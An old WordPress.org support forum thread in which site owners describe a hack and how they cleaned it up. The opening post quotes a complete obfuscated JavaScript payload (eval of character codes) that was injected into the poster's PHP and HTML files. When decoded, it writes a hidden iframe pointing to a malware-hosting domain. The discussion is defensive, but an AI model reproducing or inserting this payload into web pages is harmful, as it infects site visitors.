WordPress.org

Ready to get started?Download WordPress

Forums

Hacked (13 posts)

  1. retrovision
    Member
    Posted 5 years ago #

    <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>

    Keeps ending up appended to all the php files and html files directory where my wordpress blog is hosted.

    I found some links that describe the same problem:

    http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/#more-432
    http://wordpress.org/support/topic/255476?replies=3#post-1025429

    I noticed this hack a couple of days ago and cleaned all of the affected files, changed the files to read only and changed the passwords on everything. I did it again today.

    This causes Google chrome to give a "hacked" error:

    Warning: Visiting this site may harm your computer!

    The website at retrovision.tv contains elements from the site siplank.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for siplank.com.

  2. djmom70
    Member
    Posted 5 years ago #

    I have this same problem and don't know how to fix it. :(

  3. djmom70
    Member
    Posted 5 years ago #

    also wanted to point out that it is happening to me in Safari, but not Firefox.

    My blog is password protected, but I don't know how to fix it.

  4. whooami
    Member
    Posted 5 years ago #

    you do NOT sound like you are having the same problem as the original poster.

    what makes you believe otherwise? I suspect you may need to re-read that post and perhaps start your own thread?

  5. djmom70
    Member
    Posted 5 years ago #

    email me at djmom70 {at} cox {dot} net please.

  6. djmom70
    Member
    Posted 5 years ago #

    I get the exact same error as the previous poster does. Also followed the links he provided and saw that I have the same problem with that long string of script.

    The error does not pop up for me in Firefox, but it does in Safari.

    I've spent the last 3 hours trying to figure this out, so I'm pretty sure I'm having the same problem.

    Thank you.

  7. whooami
    Member
    Posted 5 years ago #

    Im emailing you for the url.

  8. djmom70
    Member
    Posted 5 years ago #

    just emailed you back

  9. someday
    Member
    Posted 5 years ago #

    what themes do you use?

  10. djmom70
    Member
    Posted 5 years ago #

    I'm using althuapa, but it happened even when I switched themes.

    For anyone else having this problem, whoami is a great help! I found out that all of my index.htm and index.php had been changed at the same time on the same day and sure enough it had that long code that was in this opening post. I changed all my passwords and removed the bad code. Hopefully all will be well now. I hope this helps anyone else with this issue.

  11. birdtree
    Member
    Posted 5 years ago #

    Hi, I am having the same problem with my site. The attackers have been back at least twice. We are cleaning up the files now.

  12. mnistor1
    Member
    Posted 5 years ago #

    Hello,

    I think I'm having a similar problem. Yesterday my site started spitting out the dreaded 'Visiting this site may harm your computer' so I did a search through all the files for the javascript mentioned above to no avail. I then found on the diagnostic page a reference to:
    '2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including feed2js.org/, feeds.feedburner.com/~s/.'

    Which are components of two different legitimate scripts that I have running for feedburner obviously. The weird thing is, I've had these running for a few months and never had any problems. So I just removed them and then requested google to review my site after I've removed the problem. Is this all I need to do and just wait for google to get around to reviewing my site? If so, doesn't this seem odd that google polices the internet? Anyone know how long it might take google to take down this message?

    Site I'm referencing is http://www.vintageglamblog.com

    Any help is appreciated!

    Matt

  13. snapiweb
    Member
    Posted 4 years ago #

    check your header.php and footer.php in your current theme,
    you'll see some script code in there with what looks like just scrambled letters and numbers.
    Delete this and the script tags around it.

    then go through and look at all other files to see if you can find other instances of it.

Topic Closed

This topic has been closed to new replies.

About this Topic